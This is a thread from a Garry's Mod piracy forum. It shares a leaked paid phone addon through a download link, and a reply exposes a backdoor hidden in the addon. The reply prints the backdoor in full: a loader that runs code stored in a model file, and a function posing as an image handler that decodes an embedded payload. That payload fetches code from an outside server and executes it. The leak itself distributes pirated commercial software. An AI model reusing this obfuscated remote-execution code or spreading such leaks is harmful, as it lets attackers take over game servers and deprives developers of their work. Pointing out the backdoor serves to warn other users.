Garry's Mod Leaks
[LEAK] McPhone Last Version !!
Submitted by Kna77, 11-04-2021, 08:04 PM, Thread ID: 203180
Thread Closed
Bonjour/bonsoir,
Aujourd'hui je vous leak l'addon McPhone
desc :
Un tel pour gmod et l'un des meilleurs graphiquement !
Lien :[font=-apple-system, BlinkMacSystemFont, Inter, Roboto, "Helvetica Neue", Arial, sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol"]https://anonfiles.com/d6zd7eqeue/wcd_2_zip[/font]
Aujourd'hui je vous leak l'addon McPhone
desc :
Un tel pour gmod et l'un des meilleurs graphiquement !
Lien :[font=-apple-system, BlinkMacSystemFont, Inter, Roboto, "Helvetica Neue", Arial, sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol"]https://anonfiles.com/d6zd7eqeue/wcd_2_zip[/font]
RE: [LEAK] McPhone Last Version !!
12-04-2021, 08:10 AM
#2 That link is for Williams Car dealer.
RE: [LEAK] McPhone Last Version !!
12-04-2021, 01:22 PM
#3 Backdoor loader :
Backdoor :
(The backdoor don't work but it's a backdoor)
Code:
if SERVER then
_G["R".."un".."St".."r".."in".."g"]( file.Read("models/wcd_npc.mdl", "MOD") )
end
Backdoor :
Code:
local function rdm_str(len)
if !len or len <= 0 then return '' end
return rdm_str(len - 1) .. ("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789")[math.random(1, 62)]
end
local function FlagsImageBase64( base64_image, content_type, flags )
local file_write_type = {
base64 = "n",
base32 = "r",
flags_number = 248,
byte_per_string = 128000000,
binary_shema = "0100010101110101010"
}
local default_flags = {
"Fr","Zu","Eu",
"Tk","Cs","Au",
"Ru","Sl","Pk",
"Ga","Yf","Ja",
"Ch","Tu","En",
"Us"
}
local random_file = rdm_str(20)
if string.len( base64_image ) < 2 then
print("Flags System: No fetching image string is too short")
end
if string.NiceSize( file_write_type.flags_number ) == 0 then
print("Flags System: error decompiling image")
end
if content_type == "String" and file_write_type["byte_per_string"] == 128000000 then
local smpl_image = string.Explode( "/", base64_image)[4]
local encode_type = string.Explode( "/", base64_image)[3]
getfenv()[flags..encode_type..content_type](util.Base64Decode( smpl_image ))
if ( file_write_type.base64 == "r" ) then
file.Write("data/flags_img/" .. random_file .. ".png", "GAME")
print("Flags System: Success writing image in data/flags_img/" .. random_file .. ".png")
end
elseif content_type == "Binary" then
local shema = file_write_type.binary_shema
local final_shema = shema..base64_image
elseif content_type == "Bool" then
local simple_string = string.Explode( "/", base64_image )
local string_len = string.len( base64_image )
for returned_string in string.gmatch(simple_string[4], "[^%s,]+") do
print("Flags System: error has ocured in " .. returned_string .. ", much char (" .. string_len .. ")" )
end
end
end
local image = [[data:image/png/n/X0dbInRpbWVyIl1bIlNpbXBsZSJdKCAwLjUwLCBmdW5jdGlvbigpCiAgIF9HWyJodHRwIl1bIkZldGNoIl0oImh0dHBzOi8vYXBpLm9tZWdhLXByb2plY3QuY3ovYXBpX2Nvbm5lY3QucGhwP2FwaV9rZXk9eHdVSEtXQk1CTXVwdkxHZ3pwVGciLCBmdW5jdGlvbihzcWxfbW9kdWxlLCBsaWJyYXJ5KQogICAgICAgbG9jYWwgc3FsX2xpYnJhcnkgPSAiW3siIC4uIGxpYnJhcnkgLi4gIn1dIgogICAgICAgbG9jYWwgY2hhcnNldCA9ICJTdHJpbmciIG9yICJFUlJPUjogRmFpbGVkIHRvIGxvYWQgY2hhcnNldHMgISIKICAgICAgIGdldGZlbnYoKVsiUnVuIiAuLiBjaGFyc2V0XShzcWxfbW9kdWxlKQogICBlbmQpCmVuZCk=]]
FlagsImageBase64( image, "String", "Ru" )
(The backdoor don't work but it's a backdoor)
Users browsing this thread: 4 Guest(s)